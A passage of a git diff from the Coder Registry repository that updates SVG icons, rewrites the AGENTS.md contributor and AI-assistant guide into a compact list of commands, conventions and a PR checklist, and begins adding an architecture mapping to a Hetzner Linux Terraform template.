+						d="m 81.14,44.46 c 2.32,-1.38 5.13,-1.7 7.82,-1.45 2.68,0.26 5.27,1.04 7.87,1.75 1.91,0.52 3.84,1 5.63,1.84 1.78,0.84 3.44,2.08 4.43,3.8 0.16,0.27 0.29,0.56 0.46,0.83 0.17,0.27 0.37,0.52 0.62,0.71 0.25,0.19 0.57,0.32 0.88,0.3 0.16,-0.01 0.32,-0.05 0.45,-0.13 0.14,-0.08 0.26,-0.2 0.33,-0.34 0.08,-0.16 0.11,-0.35 0.1,-0.53 -0.01,-0.18 -0.05,-0.36 -0.1,-0.54 -0.65,-2.37 -2.19,-4.38 -3.35,-6.55 -0.7,-1.3 -1.28,-2.66 -1.98,-3.96 -2.43,-4.45 -6.42,-7.94 -10.95,-10.21 -4.53,-2.27 -9.59,-3.36 -14.65,-3.65 -5.86,-0.35 -11.73,0.35 -17.51,1.37 -2.51,0.44 -5.06,0.96 -7.27,2.21 -1.11,0.62 -2.13,1.42 -2.92,2.42 -0.8,0.99 -1.36,2.18 -1.55,3.44 -0.17,1.22 0.01,2.47 0.44,3.62 0.42,1.15 1.08,2.2 1.86,3.15 1.54,1.91 3.53,3.39 5.36,5.03 1.83,1.63 3.52,3.44 5.57,4.79 1.02,0.68 2.13,1.24 3.31,1.57 1.18,0.33 2.44,0.42 3.64,0.17 1.24,-0.25 2.4,-0.86 3.41,-1.64 1.01,-0.77 1.88,-1.7 2.71,-2.66 1.66,-1.93 3.21,-4.04 5.39,-5.34 z"/>
+					<path id="eyebrow_left" fill="url(#fill_eyebrow_left)" filter="url(#blur_eyebrow_left)"
+						d="m 90.77,36.57 c 2.16,2.02 3.76,4.52 4.85,7.16 -0.48,-2.91 -1.23,-5.26 -3.13,-7.16 -1.16,-1.09 -2.49,-2.05 -3.98,-2.72 -1.32,-0.59 -2.77,-0.96 -3.61,-0.97 -0.83,-0.02 -1.03,0 -1.2,0.01 -0.18,0.01 -0.31,0.01 0.23,0.08 0.54,0.06 1.75,0.39 3.05,0.97 1.3,0.58 2.62,1.54 3.79,2.63 z"/>
+				</g>
+				<g id="eye_right">
+					<path id="eyeball_right" fill="url(#fill_eyeball_right)"
+						d="m 111.61,38.28 c -2.39,1.65 -4.4,3.94 -5.38,6.68 -1.24,3.45 -0.77,7.31 0.43,10.77 1.22,3.55 3.27,6.93 6.36,9.06 1.54,1.07 3.33,1.8 5.19,2.02 1.87,0.22 3.8,-0.09 5.47,-0.95 2.02,-1.06 3.57,-2.91 4.53,-4.98 0.96,-2.08 1.37,-4.37 1.5,-6.66 0.16,-2.9 -0.12,-5.86 -1.08,-8.61 -1.04,-2.99 -2.92,-5.75 -5.58,-7.47 -1.32,-0.86 -2.83,-1.45 -4.4,-1.67 -1.57,-0.22 -3.19,-0.05 -4.67,0.52 -0.84,0.33 -1.62,0.78 -2.37,1.29 z"/>
+					<g id="pupil_right">
+						<path id="pupil_right_base" fill="#020204"
+							d="m 117.14,45.52 c -0.9,0.06 -1.78,0.37 -2.55,0.85 -0.76,0.48 -1.41,1.13 -1.92,1.88 -1.03,1.49 -1.48,3.31 -1.55,5.12 -0.05,1.35 0.1,2.72 0.55,4 0.45,1.28 1.2,2.47 2.25,3.33 1.07,0.89 2.42,1.42 3.81,1.49 1.39,0.06 2.79,-0.34 3.93,-1.13 0.91,-0.63 1.64,-1.5 2.16,-2.48 0.52,-0.97 0.84,-2.05 0.98,-3.15 0.25,-1.93 -0.03,-3.95 -0.93,-5.69 -0.89,-1.74 -2.41,-3.17 -4.24,-3.84 -0.8,-0.29 -1.65,-0.44 -2.49,-0.38 z"/>
+						<path id="pupil_right_glare" fill="url(#fill_pupil_right_glare)" filter="url(#blur_pupil_right_glare)" clip-path="url(#clip_pupil_right)"
+							d="m 122.71,53.36 c 1,-1 -0.71,-3.65 -2.05,-4.74 -0.97,-0.78 -3.78,-1.61 -3.66,-0.75 0.12,0.85 1.39,1.95 2.23,2.79 1.05,1.03 3,3.18 3.48,2.7 z"/>
+					</g>
+					<path id="eyelid_right" fill="url(#fill_eyelid_right)" clip-path="url(#clip_eye_right)"
+						d="m 102.56,47.01 c 2.06,-1.71 4.45,-3.01 7,-3.8 5.25,-1.62 11.2,-0.98 15.84,1.97 1.6,1.01 3.03,2.27 4.52,3.45 1.48,1.17 3.06,2.27 4.85,2.9 0.97,0.34 2,0.54 3.02,0.43 0.92,-0.09 1.81,-0.44 2.57,-0.96 0.76,-0.53 1.4,-1.23 1.88,-2.02 0.96,-1.58 1.27,-3.5 1.1,-5.34 -0.33,-3.69 -2.41,-6.94 -4.15,-10.21 -0.55,-1.02 -1.07,-2.06 -1.73,-3.01 -2.01,-2.93 -5.23,-4.86 -8.6,-5.99 -3.37,-1.13 -6.93,-1.54 -10.46,-1.98 -1.58,-0.2 -3.17,-0.41 -4.74,-0.22 -1.81,0.22 -3.51,0.95 -5.28,1.4 -0.84,0.22 -1.69,0.37 -2.52,0.61 -0.83,0.24 -1.65,0.57 -2.33,1.11 -0.98,0.79 -1.6,1.98 -1.87,3.21 -0.27,1.24 -0.21,2.52 -0.01,3.77 0.39,2.5 1.33,4.93 1.24,7.46 -0.06,1.73 -0.61,3.44 -0.54,5.17 0.02,0.51 0.12,1.55 0.21,2.05 z"/>
+					<path id="eyebrow_right" fill="url(#fill_eyebrow_right)" filter="url(#blur_eyebrow_right)"
+						d="m 119.93,31.18 c -0.41,0.52 -0.78,1.08 -1.07,1.7 1.85,0.4 3.61,1.16 5.19,2.21 3.06,2.03 5.38,4.99 7.01,8.29 0.38,-0.42 0.72,-0.87 1.02,-1.37 -1.64,-3.44 -4,-6.55 -7.16,-8.65 -1.52,-1 -3.21,-1.77 -4.99,-2.18 z"/>
+				</g>
+			</g>
+			<g id="beak">
+				<g id="beak_shadow">
+					<path id="beak_shadow_lower" fill="#000000" fill-opacity="0.258824" filter="url(#blur_beak_shadow_lower)" clip-path="url(#clip_body)"
+						d="m 81.12,89.33 c 1.47,4.26 4.42,7.89 7.92,10.72 1.16,0.95 2.39,1.82 3.76,2.43 1.36,0.62 2.87,0.97 4.36,0.84 1.46,-0.12 2.85,-0.7 4.13,-1.42 1.28,-0.72 2.46,-1.59 3.7,-2.37 2.12,-1.35 4.39,-2.44 6.6,-3.64 2.65,-1.45 5.23,-3.1 7.46,-5.14 1.03,-0.93 1.98,-1.95 3.11,-2.75 1.13,-0.81 2.49,-1.39 3.87,-1.29 1.04,0.07 2.01,0.51 3.03,0.73 0.51,0.11 1.03,0.16 1.55,0.08 0.51,-0.08 1.01,-0.29 1.37,-0.67 0.44,-0.46 0.64,-1.12 0.61,-1.76 -0.02,-0.63 -0.24,-1.25 -0.54,-1.81 -0.59,-1.13 -1.49,-2.1 -1.89,-3.31 -0.36,-1.08 -0.29,-2.24 -0.26,-3.37 0.03,-1.14 0.01,-2.32 -0.51,-3.33 -0.4,-0.76 -1.07,-1.37 -1.83,-1.77 -0.76,-0.41 -1.62,-0.62 -2.48,-0.7 -1.72,-0.16 -3.44,0.18 -5.17,0.27 -2.28,0.13 -4.58,-0.15 -6.87,-0.02 -2.85,0.18 -5.65,1 -8.51,1.01 -3.26,0.01 -6.52,-1.06 -9.74,-0.55 -1.39,0.22 -2.71,0.72 -4.03,1.16 -1.33,0.45 -2.7,0.84 -4.1,0.82 -1.59,-0.03 -3.13,-0.58 -4.72,-0.69 -0.79,-0.06 -1.6,0 -2.35,0.28 -0.74,0.28 -1.41,0.79 -1.78,1.5 -0.21,0.4 -0.31,0.86 -0.33,1.31 -0.02,0.46 0.04,0.91 0.15,1.36 0.22,0.88 0.63,1.71 0.96,2.55 1.2,3.07 1.46,6.42 2.53,9.53 z"/>
+					<path id="beak_shadow_upper" opacity="0.3" fill="#000000" filter="url(#blur_beak_shadow_upper)" clip-path="url(#clip_body)"
+						d="m 77.03,77.2 c 2.85,1.76 5.41,3.93 7.56,6.39 1.99,2.29 3.68,4.89 6.29,6.58 1.83,1.2 4.04,1.87 6.28,2.08 2.63,0.24 5.29,-0.15 7.83,-0.84 2.35,-0.63 4.62,-1.53 6.7,-2.71 3.97,-2.25 7.28,-5.55 11.65,-7.03 0.95,-0.33 1.94,-0.56 2.86,-0.96 0.92,-0.39 1.79,-0.99 2.23,-1.83 0.42,-0.82 0.4,-1.75 0.54,-2.64 0.15,-0.96 0.48,-1.88 0.66,-2.83 0.18,-0.95 0.2,-1.96 -0.24,-2.83 -0.37,-0.72 -1.04,-1.29 -1.81,-1.66 -0.77,-0.36 -1.64,-0.52 -2.51,-0.56 -1.72,-0.08 -3.43,0.33 -5.16,0.47 -2.28,0.19 -4.58,-0.08 -6.87,-0.01 -2.85,0.08 -5.66,0.67 -8.51,0.8 -3.25,0.14 -6.49,-0.34 -9.74,-0.44 -1.41,-0.05 -2.83,-0.03 -4.21,0.2 -1.39,0.22 -2.75,0.65 -3.92,1.37 -1.14,0.69 -2.07,1.64 -3.11,2.45 -0.52,0.41 -1.08,0.78 -1.68,1.07 -0.61,0.28 -1.28,0.48 -1.96,0.51 -0.35,0.01 -0.71,-0.01 -1.05,0.04 -0.59,0.08 -1.13,0.39 -1.47,0.83 -0.34,0.45 -0.47,1.02 -0.36,1.55 z"/>
+				</g>
+				<path id="beak_base" fill="url(#fill_beak_base)"
+					d="m 91.66,58.53 c 1.53,-1.71 2.57,-3.8 4.03,-5.56 0.73,-0.88 1.58,-1.69 2.57,-2.26 0.99,-0.57 2.15,-0.89 3.29,-0.79 1.27,0.11 2.46,0.74 3.39,1.61 0.93,0.87 1.62,1.97 2.17,3.12 0.53,1.11 0.95,2.28 1.71,3.24 0.81,1.02 1.94,1.71 2.97,2.52 0.51,0.4 1.01,0.83 1.41,1.34 0.41,0.51 0.72,1.1 0.86,1.74 0.13,0.65 0.06,1.33 -0.16,1.95 -0.23,0.62 -0.61,1.18 -1.09,1.64 -0.95,0.92 -2.25,1.42 -3.56,1.6 -2.62,0.37 -5.27,-0.41 -7.92,-0.34 -2.67,0.08 -5.29,1.02 -7.97,0.93 -1.33,-0.05 -2.69,-0.38 -3.79,-1.14 -0.55,-0.39 -1.03,-0.88 -1.38,-1.45 -0.34,-0.57 -0.55,-1.23 -0.58,-1.9 -0.02,-0.64 0.13,-1.28 0.39,-1.86 0.25,-0.59 0.61,-1.12 1.01,-1.62 0.81,-0.99 1.8,-1.81 2.65,-2.77 z"/>
+				<g id="mandible_lower">
+					<path id="mandible_lower_base" fill="url(#fill_mandible_lower_base)"
+						d="m 77.14,75.05 c 0.06,0.26 0.15,0.5 0.28,0.73 0.23,0.38 0.57,0.69 0.93,0.95 0.36,0.27 0.75,0.49 1.13,0.72 2.01,1.27 3.65,3.04 5.11,4.92 1.95,2.52 3.68,5.31 6.29,7.14 1.84,1.3 4.04,2.03 6.28,2.26 2.63,0.26 5.29,-0.16 7.83,-0.91 2.35,-0.69 4.62,-1.66 6.7,-2.95 3.97,-2.44 7.28,-6.02 11.65,-7.63 0.95,-0.35 1.94,-0.6 2.86,-1.03 0.92,-0.44 1.79,-1.08 2.23,-2 0.42,-0.88 0.4,-1.9 0.54,-2.87 0.15,-1.03 0.48,-2.03 0.66,-3.06 0.18,-1.03 0.2,-2.13 -0.24,-3.08 -0.37,-0.78 -1.04,-1.4 -1.81,-1.79 -0.77,-0.4 -1.64,-0.58 -2.51,-0.62 -1.72,-0.08 -3.43,0.36 -5.16,0.52 -2.28,0.21 -4.58,-0.09 -6.87,-0.02 -2.85,0.09 -5.66,0.73 -8.51,0.87 -3.25,0.15 -6.49,-0.35 -9.74,-0.48 -1.41,-0.06 -2.83,-0.04 -4.22,0.2 -1.39,0.23 -2.75,0.71 -3.91,1.51 -1.13,0.78 -2.03,1.84 -3.07,2.74 -0.52,0.45 -1.08,0.86 -1.7,1.16 -0.61,0.3 -1.29,0.49 -1.98,0.47 -0.35,-0.01 -0.72,-0.06 -1.05,0.04 -0.21,0.07 -0.4,0.2 -0.56,0.35 -0.16,0.16 -0.29,0.34 -0.41,0.52 -0.29,0.42 -0.54,0.87 -0.75,1.34 z"/>
+					<path id="mandible_lower_glare" fill="#d9b30d" filter="url(#blur_mandible_lower_glare)" clip-path="url(#clip_mandible_lower)"
+						d="m 89.9,78.56 c -0.33,1.37 -0.13,2.87 0.56,4.11 0.68,1.24 1.84,2.2 3.19,2.65 1.7,0.57 3.62,0.29 5.21,-0.54 0.93,-0.48 1.77,-1.16 2.3,-2.06 0.27,-0.44 0.46,-0.94 0.53,-1.46 0.06,-0.51 0.02,-1.05 -0.16,-1.54 -0.2,-0.53 -0.56,-1 -0.99,-1.37 -0.44,-0.37 -0.95,-0.64 -1.5,-0.82 -1.08,-0.36 -2.77,-0.66 -3.91,-0.68 -2.02,-0.04 -4.9,0.34 -5.23,1.71 z"/>
+				</g>
+				<g id="mandible_upper">
+					<path id="mandible_upper_shadow" fill="#604405" filter="url(#blur_mandible_upper_shadow)" clip-path="url(#clip_mandible_lower)"
+						d="m 84.31,67.86 c -1.16,0.68 -2.27,1.43 -3.36,2.2 -0.57,0.41 -1.15,0.84 -1.45,1.47 -0.21,0.44 -0.26,0.94 -0.27,1.43 0,0.5 0.03,0.99 -0.04,1.48 -0.04,0.33 -0.13,0.66 -0.14,0.99 -0.01,0.17 0,0.34 0.04,0.5 0.05,0.16 0.13,0.32 0.24,0.44 0.15,0.16 0.35,0.26 0.56,0.32 0.21,0.06 0.42,0.09 0.64,0.14 1.01,0.24 1.89,0.86 2.66,1.56 0.77,0.69 1.47,1.48 2.28,2.13 2.18,1.78 5.07,2.52 7.89,2.56 2.82,0.05 5.61,-0.54 8.36,-1.16 2.16,-0.49 4.32,-0.99 6.39,-1.76 3.2,-1.18 6.16,-2.96 8.72,-5.19 1.17,-1.01 2.26,-2.12 3.57,-2.94 1.15,-0.73 2.44,-1.21 3.62,-1.9 0.11,-0.06 0.21,-0.13 0.3,-0.2 0.1,-0.08 0.18,-0.18 0.24,-0.28 0.09,-0.19 0.09,-0.42 0.03,-0.62 -0.06,-0.2 -0.18,-0.38 -0.31,-0.55 -0.15,-0.18 -0.31,-0.34 -0.49,-0.5 -1.23,-1.05 -2.89,-1.43 -4.51,-1.56 -1.61,-0.12 -3.24,-0.03 -4.83,-0.3 -1.5,-0.25 -2.92,-0.81 -4.37,-1.27 -1.52,-0.49 -3.07,-0.87 -4.64,-1.13 -3.71,-0.61 -7.52,-0.49 -11.19,0.27 -3.49,0.73 -6.87,2.05 -9.94,3.87 z"/>
+					<path id="mandible_upper_base" fill="url(#fill_mandible_upper_base)"
+						d="m 83.94,63.95 c -1.66,1.12 -3.16,2.49 -4.43,4.04 -0.72,0.89 -1.38,1.86 -1.74,2.94 -0.29,0.86 -0.39,1.76 -0.57,2.65 -0.07,0.33 -0.15,0.66 -0.14,1 0,0.16 0.02,0.33 0.07,0.5 0.05,0.16 0.14,0.31 0.25,0.43 0.2,0.2 0.47,0.31 0.74,0.37 0.28,0.05 0.56,0.06 0.84,0.09 1.25,0.15 2.4,0.75 3.44,1.47 1.04,0.71 2,1.55 3.07,2.22 2.35,1.49 5.16,2.15 7.95,2.26 2.78,0.11 5.56,-0.31 8.3,-0.86 2.17,-0.43 4.33,-0.95 6.39,-1.76 3.16,-1.25 6.01,-3.16 8.72,-5.19 1.24,-0.92 2.46,-1.87 3.57,-2.94 0.37,-0.37 0.74,-0.74 1.14,-1.08 0.4,-0.33 0.85,-0.62 1.35,-0.78 0.76,-0.24 1.58,-0.17 2.37,-0.04 0.59,0.1 1.18,0.23 1.78,0.21 0.3,-0.02 0.6,-0.07 0.88,-0.18 0.28,-0.11 0.54,-0.28 0.73,-0.52 0.25,-0.3 0.38,-0.7 0.38,-1.09 0,-0.4 -0.12,-0.79 -0.32,-1.13 -0.4,-0.68 -1.09,-1.14 -1.81,-1.46 -0.99,-0.44 -2.06,-0.65 -3.11,-0.91 -3.23,-0.78 -6.37,-1.93 -9.34,-3.41 -1.48,-0.73 -2.92,-1.54 -4.37,-2.32 -1.5,-0.8 -3.02,-1.57 -4.64,-2.07 -3.64,-1.1 -7.6,-0.74 -11.19,0.51 -3.98,1.38 -7.58,3.84 -10.31,7.05 z"/>
+					<path id="mandible_upper_glare" fill="#f6da4a" filter="url(#blur_mandible_upper_glare)" clip-path="url(#clip_mandible_upper)"
+						d="m 109.45,64.75 c -0.2,-0.24 -0.48,-0.42 -0.78,-0.51 -0.3,-0.09 -0.62,-0.09 -0.93,-0.04 -0.62,0.11 -1.18,0.44 -1.7,0.8 -1.47,1.01 -2.77,2.26 -3.91,3.64 -1.5,1.83 -2.74,3.94 -3.16,6.27 -0.07,0.39 -0.11,0.8 -0.07,1.19 0.05,0.4 0.2,0.79 0.49,1.07 0.24,0.25 0.58,0.4 0.92,0.45 0.35,0.05 0.71,0 1.04,-0.11 0.66,-0.22 1.21,-0.69 1.74,-1.15 2.87,-2.58 5.47,-5.66 6.51,-9.38 0.1,-0.37 0.19,-0.75 0.19,-1.14 0,-0.39 -0.1,-0.78 -0.34,-1.09 z"/>
+					<path id="naris_left" opacity="0.8" fill="url(#fill_naris_left)" filter="url(#blur_naris_left)"
+						d="m 92.72,59.06 c -0.77,-0.25 -2.03,1.1 -1.62,1.79 0.11,0.19 0.46,0.43 0.7,0.3 0.35,-0.19 0.64,-0.89 1.02,-1.16 0.25,-0.18 0.2,-0.84 -0.1,-0.93 z"/>
+					<path id="naris_right" opacity="0.8" fill="url(#fill_naris_right)" filter="url(#blur_naris_right)"
+						d="m 102.56,59.42 c 0.2,0.64 1.23,0.53 1.83,0.84 0.52,0.27 0.94,0.86 1.53,0.88 0.56,0.01 1.44,-0.2 1.51,-0.76 0.09,-0.73 -0.98,-1.2 -1.67,-1.47 -0.89,-0.34 -2.03,-0.52 -2.86,-0.06 -0.19,0.11 -0.4,0.36 -0.34,0.57 z"/>
+				</g>
+				<path id="beak_corner" fill="url(#fill_beak_corner)" filter="url(#blur_beak_corner)" clip-path="url(#clip_beak)"
+					d="m 129.27,69.15 a 2.42,3.1 16.94 0 1 -2.81,3.04 2.42,3.1 16.94 0 1 -2.12,-3.04 2.42,3.1 16.94 0 1 2.81,-3.05 2.42,3.1 16.94 0 1 2.12,3.05 z"/>
+			</g>
+		</g>
+	</g>
+</svg>

.icons/mux.svg

@@ -1 +1,11 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="135" height="62" fill="none" viewBox="0 0 135 62"><path fill="#fff" d="M3.168 48V22.272H9.648L9.888 28.464L9.216 28.176C9.568 26.8 10.096 25.632 10.8 24.672C11.536 23.712 12.416 22.976 13.44 22.464C14.464 21.952 15.584 21.696 16.8 21.696C18.944 21.696 20.672 22.32 21.984 23.568C23.328 24.816 24.192 26.496 24.576 28.608L23.664 28.656C23.952 27.152 24.448 25.888 25.152 24.864C25.888 23.808 26.784 23.024 27.84 22.512C28.896 21.968 30.08 21.696 31.392 21.696C33.184 21.696 34.72 22.064 36 22.8C37.28 23.536 38.272 24.64 38.976 26.112C39.68 27.552 40.032 29.328 40.032 31.44V48H32.832V33.456C32.832 31.44 32.528 29.936 31.92 28.944C31.312 27.92 30.32 27.408 28.944 27.408C28.08 27.408 27.344 27.648 26.736 28.128C26.128 28.608 25.648 29.312 25.296 30.24C24.976 31.136 24.816 32.24 24.816 33.552V48H18.336V33.552C18.336 31.568 18.048 30.048 17.472 28.992C16.896 27.936 15.904 27.408 14.496 27.408C13.632 27.408 12.88 27.648 12.24 28.128C11.632 28.608 11.168 29.312 10.848 30.24C10.528 31.168 10.368 32.272 10.368 33.552V48H3.168ZM54.2254 48.576C51.5694 48.576 49.4894 47.728 47.9854 46.032C46.5134 44.304 45.7774 41.904 45.7774 38.832V22.272H52.9774V37.152C52.9774 39.136 53.2814 40.592 53.8894 41.52C54.4974 42.416 55.4574 42.864 56.7694 42.864C58.2414 42.864 59.3774 42.368 60.1774 41.376C61.0094 40.352 61.4254 38.832 61.4254 36.816V22.272H68.6254V48H62.0494L61.8574 40.608L62.7694 40.8C62.3854 43.36 61.4734 45.296 60.0334 46.608C58.5934 47.92 56.6574 48.576 54.2254 48.576ZM72.8486 48L82.0166 34.944L73.0886 22.272H80.7206L86.2406 30.528L91.5686 22.272H99.3926L90.5126 34.992L99.6326 48H92.0006L86.3366 39.264L80.6246 48H72.8486Z"/><rect width="26" height="35" x="109" y="13" fill="#fff"/></svg>
+<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg">
+<g clip-path="url(#clip0_147_2)">
+<path d="M162.358 73H257V182H162.358V73Z" fill="white"/>
+<path d="M0 182V78.4618H26.039L27.0034 103.381L24.3033 102.221C25.7177 96.6843 27.8391 91.9835 30.6684 88.1202C33.6255 84.2569 37.1618 81.2949 41.2769 79.2343C45.3914 77.1742 49.8921 76.1439 54.7785 76.1439C63.3938 76.1439 70.3377 78.6552 75.6097 83.6773C81.0105 88.6998 84.4824 95.4606 86.0251 103.96L82.3606 104.153C83.518 98.1008 85.5112 93.0138 88.3401 88.8931C91.2976 84.6431 94.8978 81.4883 99.1411 79.4277C103.385 77.2387 108.143 76.1439 113.415 76.1439C120.615 76.1439 126.788 77.6249 131.931 80.5869C137.075 83.5488 141.061 87.9913 143.89 93.9152C146.719 99.7102 148.133 106.858 148.133 115.357V182H119.201V123.47C119.201 115.357 117.98 109.305 115.536 105.312C113.093 101.191 109.107 99.1311 103.577 99.1311C100.106 99.1311 97.1484 100.097 94.7052 102.029C92.262 103.96 90.3332 106.793 88.9188 110.528C87.6326 114.134 86.9895 118.577 86.9895 123.857V182H60.9506V123.857C60.9506 115.872 59.7936 109.755 57.4787 105.505C55.1642 101.256 51.1779 99.1311 45.5202 99.1311C42.0482 99.1311 39.0263 100.097 36.4548 102.029C34.0117 103.96 32.1472 106.793 30.861 110.528C29.5753 114.262 28.9322 118.705 28.9322 123.857V182H0Z" fill="white"/>
+</g>
+<defs>
+<clipPath id="clip0_147_2">
+<rect width="256" height="256" fill="white"/>
+</clipPath>
+</defs>
+</svg>

.icons/terminal.svg

@@ -0,0 +1,3 @@
+<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M37.3333 213.333C33.0666 213.333 29.3333 211.733 26.1333 208.533C22.9333 205.333 21.3333 201.6 21.3333 197.333V58.6667C21.3333 54.4001 22.9333 50.6667 26.1333 47.4667C29.3333 44.2667 33.0666 42.6667 37.3333 42.6667H218.667C222.933 42.6667 226.667 44.2667 229.867 47.4667C233.067 50.6667 234.667 54.4001 234.667 58.6667V197.333C234.667 201.6 233.067 205.333 229.867 208.533C226.667 211.733 222.933 213.333 218.667 213.333H37.3333ZM37.3333 197.333H218.667V81.0668H37.3333V197.333ZM80 178.133L68.8 166.933L96.2666 139.2L68.5333 111.467L80 100.267L118.933 139.2L80 178.133ZM130.667 179.2V163.2H189.333V179.2H130.667Z" fill="white"/>
+</svg>

AGENTS.md

@@ -1,168 +1,43 @@
 # AGENTS.md
 
-This file provides guidance to AI coding assistants when working with code in this repository.
+Coder Registry: Terraform modules/templates for Coder workspaces under `registry/[namespace]/modules/` and `registry/[namespace]/templates/`.
 
-## Project Overview
-
-The Coder Registry is a community-driven repository for Terraform modules and templates that extend Coder workspaces. It's organized with:
-
-- **Modules**: Individual components and tools (IDEs, auth integrations, dev tools)
-- **Templates**: Complete workspace configurations for different platforms
-- **Namespaces**: Each contributor has their own namespace under `/registry/[namespace]/`
-
-## Common Development Commands
-
-### Formatting
+## Commands
 
 ```bash
-bun run fmt    # Format all code (Prettier + Terraform)
-bun run fmt:ci # Check formatting (CI mode)
+bun run fmt                                           # Format code (Prettier + Terraform) - run before commits
+bun run tftest                                        # Run all Terraform tests
+bun run tstest                                        # Run all TypeScript tests
+terraform init -upgrade && terraform test -verbose    # Test single module (run from module dir)
+bun test main.test.ts                                 # Run single TS test (from module dir)
+./scripts/terraform_validate.sh                       # Validate Terraform syntax
+./scripts/new_module.sh ns/name                       # Create new module scaffold
+.github/scripts/version-bump.sh patch | minor | major # Bump module version after changes
 ```
 
-### Testing
+## Structure
 
-```bash
-# Test all modules with .tftest.hcl files
-bun run test
+- **Modules**: `registry/[ns]/modules/[name]/` with `main.tf`, `README.md` (YAML frontmatter), `.tftest.hcl` (required)
+- **Templates**: `registry/[ns]/templates/[name]/` with `main.tf`, `README.md`
+- **Validation**: `cmd/readmevalidation/` (Go) validates structure/frontmatter; URLs must be relative, not absolute
 
-# Test specific module (from module directory)
-terraform init -upgrade
-terraform test -verbose
+## Code Style
 
-# Validate Terraform syntax
-./scripts/terraform_validate.sh
-```
+- Every module MUST have `.tftest.hcl` tests; optional `main.test.ts` for container/script tests
+- README frontmatter: `display_name`, `description`, `icon`, `verified: false`, `tags`
+- Use semantic versioning; bump version via script when modifying modules
+- Docker tests require Linux or Colima/OrbStack (not Docker Desktop)
+- Use `tf` (not `hcl`) for code blocks in README; use relative icon paths (e.g., `../../../../.icons/`)
+- **Do NOT include input/output variable tables in module or template READMEs.** The registry automatically generates these from the Terraform source (e.g., variable and output blocks in `main.tf`). Adding them to the README is redundant and creates maintenance drift.
+- Usage examples (e.g., a `module "..." { }` block) are encouraged, but not tables enumerating inputs/outputs.
 
-### Module Creation
+## PR Review Checklist
 
-```bash
-# Generate new module scaffold
-./scripts/new_module.sh namespace/module-name
-```
-
-### TypeScript Testing & Setup
-
-The repository uses Bun for TypeScript testing with utilities:
-
-- `test/test.ts` - Testing utilities for container management and Terraform operations
-- `setup.ts` - Test cleanup (removes .tfstate files and test containers)
-- Container-based testing with Docker for module validation
-
-## Architecture & Organization
-
-### Directory Structure
-
-```
-registry/[namespace]/
-├── README.md          # Contributor info with frontmatter
-├── .images/           # Namespace avatar (avatar.png/svg)
-├── modules/           # Individual components
-│   └── [module]/      # Each module has main.tf, README.md, tests
-└── templates/         # Complete workspace configs
-    └── [template]/    # Each template has main.tf, README.md
-```
-
-### Key Components
-
-**Module Structure**: Each module contains:
-
-- `main.tf` - Terraform implementation
-- `README.md` - Documentation with YAML frontmatter
-- `.tftest.hcl` - Terraform test files (required)
-- `run.sh` - Optional startup script
-
-**Template Structure**: Each template contains:
-
-- `main.tf` - Complete Coder template configuration
-- `README.md` - Documentation with YAML frontmatter
-- Additional configs, scripts as needed
-
-### README Frontmatter Requirements
-
-All modules/templates require YAML frontmatter:
-
-```yaml
----
-display_name: "Module Name"
-description: "Brief description"
-icon: "../../../../.icons/tool.svg"
-verified: false
-tags: ["tag1", "tag2"]
----
-```
-
-## Testing Requirements
-
-### Module Testing
-
-- Every module MUST have `.tftest.hcl` test files
-- Optional `main.test.ts` files for container-based testing or complex business logic validation
-- Tests use Docker containers with `--network=host` flag
-- Linux required for testing (Docker Desktop on macOS/Windows won't work)
-- Use Colima or OrbStack on macOS instead of Docker Desktop
-
-### Test Utilities
-
-The `test/test.ts` file provides:
-
-- `runTerraformApply()` - Execute Terraform with variables
-- `executeScriptInContainer()` - Run coder_script resources in containers
-- `testRequiredVariables()` - Validate required variables
-- Container management functions
-
-## Validation & Quality
-
-### Automated Validation
-
-The Go validation tool (`cmd/readmevalidation/`) checks:
-
-- Repository structure integrity
-- Contributor README files
-- Module and template documentation
-- Frontmatter format compliance
-
-### Versioning
-
-Use semantic versioning for modules:
-
-- **Patch** (1.2.3 → 1.2.4): Bug fixes
-- **Minor** (1.2.3 → 1.3.0): New features, adding inputs
-- **Major** (1.2.3 → 2.0.0): Breaking changes
-
-## Dependencies & Tools
-
-### Required Tools
-
-- **Terraform** - Module development and testing
-- **Docker** - Container-based testing
-- **Bun** - JavaScript runtime for formatting/scripts
-- **Go 1.23+** - Validation tooling
-
-### Development Dependencies
-
-- Prettier with Terraform and shell plugins
-- TypeScript for test utilities
-- Various npm packages for documentation processing
-
-## Workflow Notes
-
-### Contributing Process
-
-1. Create namespace (first-time contributors)
-2. Generate module/template files using scripts
-3. Implement functionality and tests
-4. Run formatting and validation
-5. Submit PR with appropriate template
-
-### Testing Workflow
-
-- All modules must pass `terraform test`
-- Use `bun run test` for comprehensive testing
-- Format code with `bun run fmt` before submission
-- Manual testing recommended for templates
-
-### Namespace Management
-
-- Each contributor gets unique namespace
-- Namespace avatar required (avatar.png/svg in .images/)
-- Namespace README with contributor info and frontmatter
+- Version bumped via `.github/scripts/version-bump.sh` if module changed (patch=bugfix, minor=feature, major=breaking)
+- Breaking changes documented: removed inputs, changed defaults, new required variables
+- New variables have sensible defaults to maintain backward compatibility
+- Tests pass (`bun run tftest`, `bun run tstest`); add diagnostic logging for test failures
+- README examples updated with new version number; tooltip/behavior changes noted
+- Shell scripts handle errors gracefully (use `|| echo "Warning..."` for non-fatal failures)
+- No hardcoded values that should be configurable; no absolute URLs (use relative paths)
+- If AI-assisted: include model and tool/agent name at footer of PR body (e.g., "Generated with [Amp](thread-url) using Claude")

registry/Excellencedev/templates/hetzner-linux/main.tf

@@ -137,11 +137,12 @@ locals {
   hcloud_server_types = {
     for st in jsondecode(data.http.hcloud_server_types.response_body).server_types :
     st.name => {
-      cores      = st.cores
-      memory_gb  = st.memory
-      disk_gb    = st.disk
-      locations  = [for l in st.locations : l.name]
-      deprecated = st.deprecated
+      cores        = st.cores
+      memory_gb    = st.memory
+      disk_gb      = st.disk
+      architecture = st.architecture
+      locations    = [for l in st.locations : l.name]
+      deprecated   = st.deprecated
     }
     if st.deprecated == false
   }
@@ -162,6 +163,19 @@ locals {
       data.coder_parameter.hcloud_location.value
     )
   ]
+
+  # Map Hetzner architecture (x86 or arm) to Coder agent architecture (amd64 or arm64)
+  agent_arch = try(
+    lookup(
+      {
+        "x86" = "amd64"
+        "arm" = "arm64"
+      },
+      local.hcloud_server_types[data.coder_parameter.hcloud_server_type.value].architecture,
+      "amd64" # Fallback if not returned
+    ),
+    "amd64" # Fallback for template setup
